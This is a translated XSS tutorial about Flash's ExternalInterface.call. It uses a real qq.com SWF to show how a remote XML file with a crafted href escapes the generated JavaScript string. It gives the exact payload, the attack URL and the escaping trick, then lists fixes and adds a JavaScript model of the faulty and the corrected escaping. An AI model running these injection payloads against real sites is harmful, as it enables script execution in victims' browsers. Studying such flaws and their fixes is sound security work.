ExternalInterface.call: having covered the first parameter of the call, we will now talk about the "2nd" parameter. The quotation marks are there because the prototype of call is call(functionName:String, ... arguments):*, so any number of parameters can follow the function name; here they are referred to collectively as the 2nd parameter. Sometimes we run into ExternalInterface.call("xxxxx", "controllable content");. How can XSS be constructed in that case?
1. With the foundation of the previous tutorial, we can go straight to an example. A Google search for site:qq.com filetype:swf inurl:xml turns up the following Flash file:
http://imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml
2. Look at the content of http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml.
3. It does not look usable at first sight, so we decompile the Flash file.
4. We look for getURL, ExternalInterface.call and the like, and find the following line:
flash.external.ExternalInterface.call("custom_menu_swf", menu_array[_local2].href);
The first parameter of the call is hard-coded, and the 2nd parameter is menu_array[_local2].href. With a little ActionScript knowledge it is easy to see that menu_array is an array and _local2 is an index into it; the name "menu array" immediately brings to mind the data in the XML file above.
5. In other words, we control the 2nd parameter of the call here. Using the method from tutorial 14, download http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml, modify it, and upload it to your own website. We change the href of the "log" line in the file to:
<menu name="log" href="\&quot;, alert(1)"/>
Upload the modified file, and remember to also upload a crossdomain.xml file to the root directory of your website (see tutorial 14).
6. Load the XML file we specified:
http://imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://itsokla.duapp.com/custom_menu.xml
7. Open Firefox. Someone will ask: why suddenly Firefox? Crazy!! Comrades, I am not crazy; it is just that Firefox can catch the error here while Chrome cannot! Open the address above in Firefox and click the "log" button, then press Ctrl+Shift+J to open the error console. The following error is displayed (shown as a screenshot in the original):
8. A reader with a good memory will immediately recall what was said in the previous section: ExternalInterface.call("function name", "parameter 1"); actually executes the following:
try { __flash__toXML(function name("parameter 1")); } catch (e) { "<undefined/>"; }
This is exactly the error we caught in Firefox (of course there are other ways to catch it). Why? Let's take a look.
9. When "log" is clicked, the following is called:
flash.external.ExternalInterface.call("custom_menu_swf", menu_array[_local2].href);
with menu_array[_local2].href equal to \", alert(1). The complete code that gets executed is therefore:
try { __flash__toXML(custom_menu_swf("\\", alert(1)")); } catch (e) { "<undefined/>"; }
(The conversion process was shown as a screenshot in the original.) After the conversion the JavaScript is a mess: quotation marks everywhere and brackets that no longer match up, so an error is reported.
10. How do we construct code that works? With the knowledge of the previous section it is actually not difficult. Start from:
try { __flash__toXML(custom_menu_swf("construction point")); } catch (e) { "<undefined/>"; }
First step: to inject our own code we must first close the double quotation mark:
try { __flash__toXML(custom_menu_swf("constructor"), alert("constructor")); } catch (e) { "<undefined/>"; }
But from the conversion process above we know that " becomes \", so this turns into the following and we still do not break out:
try { __flash__toXML(custom_menu_swf("constructor\"), alert(\"constructor")); } catch (e) { "<undefined/>"; }
Fortunately, \ itself is not escaped here, so we can use it in the input: in a JS string \\ represents a single \, which leaves the " that follows unescaped. The result is:
try { __flash__toXML(custom_menu_swf("constructor\\")} catch (e) {alert(1)} // constructor")); } catch (e) { "<undefined/>"; }
(An image analysis followed here in the original.)
11. After all this code, let's take the constructed code and insert it into the XML file. Note the following:
11.1 The final constructed code contains \\", but our actual input is \": Flash adds the second backslash when it escapes the quotation mark, so you only need to type \" in the XML.
11.2 Inside an XML attribute a double quotation mark is written as &quot;:
<menu name="log" href="constructor\&quot;)} catch (e) {alert(1)} // constructor"/>
12. Upload the file again, open http://imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://itsokla.duapp.com/custom_menu.xml and click "log" to see the effect.
Solution:
1. Escape the \ before passing it in as the 2nd parameter of call.
2. Do not load third-party external XML files.
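The conversion from steps 8 to 11 and the first fix from the solution, as an added JavaScript example that is not code from the tutorial or from Flash itself: it rebuilds the try/catch snippet with the escaping the tutorial observed (only " is escaped) beside the corrected escaping (\ escaped first), and checks whether the 2nd parameter still forms one intact string literal. The function names and the JSON-based check are assumptions of this example.

```javascript
// Added example (not from the tutorial): models how ExternalInterface.call
// wraps its 2nd parameter into the JavaScript snippet the tutorial shows.
// Function names are hypothetical.

// Escaping as observed in the tutorial: a double quote becomes \" but a
// backslash is passed through untouched.
function escapeAsObserved(arg) {
  return String(arg).replace(/"/g, '\\"');
}

// Solution 1: escape the backslash first, then the double quote, so a
// user-supplied \ can no longer cancel the backslash Flash adds.
function escapeFixed(arg) {
  return String(arg).replace(/\\/g, '\\\\').replace(/"/g, '\\"');
}

// Build the snippet handed to the browser for ExternalInterface.call(fn, arg)
// using the chosen escaper.
function buildSnippet(fn, arg, escaper) {
  return 'try { __flash__toXML(' + fn + '("' + escaper(arg) +
         '")); } catch (e) { "<undefined/>"; }';
}

// Defender-side check: does the escaped value still form exactly one string
// literal that decodes back to the original argument? JSON string syntax is
// used as the parser because it handles \" and \\ the same way JavaScript does
// (assumption of this example: only these two characters are in scope).
function literalStaysIntact(arg, escaper) {
  try {
    return JSON.parse('"' + escaper(arg) + '"') === String(arg);
  } catch (e) {
    return false; // the literal was broken open or left unterminated
  }
}

// Constructed input: the href value the tutorial places in custom_menu.xml.
const TUTORIAL_HREF = '\\", alert(1)';

console.log(buildSnippet('custom_menu_swf', TUTORIAL_HREF, escapeAsObserved));
console.log(literalStaysIntact(TUTORIAL_HREF, escapeAsObserved)); // false
console.log(buildSnippet('custom_menu_swf', TUTORIAL_HREF, escapeFixed));
console.log(literalStaysIntact(TUTORIAL_HREF, escapeFixed));      // true
```

With the observed escaping the href turns into \\" and the literal closes early, which is the mismatched-brackets error seen in the Firefox console; with backslashes escaped first the value decodes back unchanged and stays inside the string.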